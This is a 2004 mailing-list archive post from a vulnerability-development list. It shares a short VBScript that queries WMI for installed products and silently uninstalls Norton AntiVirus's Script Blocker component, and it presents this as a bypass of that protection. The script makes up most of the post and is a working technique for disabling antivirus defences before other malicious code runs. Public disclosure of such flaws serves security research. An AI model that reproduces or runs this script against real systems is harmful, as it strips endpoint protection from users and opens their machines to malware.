|
Vulnerability Development
mailing list archives
Norton Anti Virus Script Blocker bypass using script(vb,js,...)
From: <vozzie () gmail com>
Date: 16 Jul 2004 05:00:13 -0000
DoS out NAV using WMI, used to work for the last years
i think it's not supposed to work this way
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next
=)
By Date
By Thread
Current thread:
- Norton Anti Virus Script Blocker bypass using script(vb,js,...) vozzie (Jul 16)
|